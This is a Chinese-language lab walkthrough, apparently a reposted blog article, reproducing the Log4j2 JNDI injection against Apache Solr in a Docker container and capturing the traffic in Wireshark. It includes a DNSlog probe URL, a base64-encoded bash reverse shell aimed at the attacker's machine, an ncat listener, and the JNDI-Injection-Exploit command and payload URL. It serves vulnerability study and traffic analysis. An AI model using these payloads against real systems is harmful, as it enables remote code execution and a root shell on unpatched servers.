当前位置: 首页 > news >正文

复现log4j2的jndi注入成功反弹shell

在Apache Solr 中复现log4j2的jndi注入漏洞,获得docker容器的root权限,实验五步走:

  1. 启动容器
  2. 访问web页面
  3. 漏洞探测
  4. 反弹shell载荷
  5. wireshark抓取log4j反弹shell流量

ailx10

1956 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

一、启动容器

二、访问web页面

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

三、漏洞探测

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ueg2ky.dnslog.cn} 

四、反弹shell载荷

IP地址192.168.0.104 是我的mac电脑

bash -i >& /dev/tcp/192.168.0.104/6666 0>&1

对上面的命令进行bash64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==

先在mac上进行监听

ncat -l 6666

在mac上运行漏洞利用命令[1]

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.104

用上面的命令结果访问靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://192.168.0.104:1389/9gozs8}

在mac上成功接收到靶机反弹的shell

五、wireshark抓取log4j反弹shell流量

我们可以清楚的看到攻击者访问了靶机有漏洞的页面

紧接着看到靶机主动访问了攻击者的IP地址,攻击者给靶机响应了200 OK状态码

反弹shell后,我们敲击一个ls,获得流量如下,都是TCP连接

请求流量

响应流量

参考

  1. ^JNDI-Injection-Exploit Releases · welk1n/JNDI-Injection-Exploit · GitHub
http://www.dtcms.com/a/24330.html

相关文章:

  • SQL进阶技巧:如何统计用户跨端消费行为?
  • (leetcode 1749 前缀和)1749. 任意子数组和的绝对值的最大值
  • 【嵌入式Linux应用开发基础】进程实战开发
  • 华为固态电池引发的思索
  • 2.18寒假
  • 06:高级命令
  • DeepSeek驱动下的数据仓库范式转移:技术解耦、认知重构与治理演进
  • 解析JUC包底层源码实现
  • 3.5 使用Tokenizer编解码文本:从原理到企业级实践
  • ArcGIS笔记之度分秒与十进制度的转换
  • 【分治法】棋盘覆盖问题 C/C++(附代码和测试实例及算法分析)
  • C语言——字符串
  • Udp发送和接收数据(python和QT)
  • 2025-02-18 学习记录--C/C++-PTA 7-25 念数字
  • 鱼骨图技能详解
  • macos安装jmeter测试软件
  • PHP语法入门完全指南(2024新版)
  • 【Spring】Spring配置文件
  • MapReduce远程调试
  • 如何利用快捷指令制作快递取件码提醒?
  • Java 反射机制深度解析:类信息的来源、declared 的区别、赋值操作及暴力反射
  • 如何避免redis长期运行持久化AOF文件过大的问题:AOF重写
  • Docker安装Quickwit搜索引擎
  • 捷米特 JM - RTU - TCP 网关应用 F - net 协议转 Modbus TCP 实现电脑控制流量计
  • 【gRPC】:快速上手gRPC与protobuf
  • 深入理解 C++17 中的 std::launder
  • 常用标准库之-std::iota
  • 初等数论--欧几里得算法
  • 网络技术变迁:从IPv4走向IPv6
  • Java基础(其一)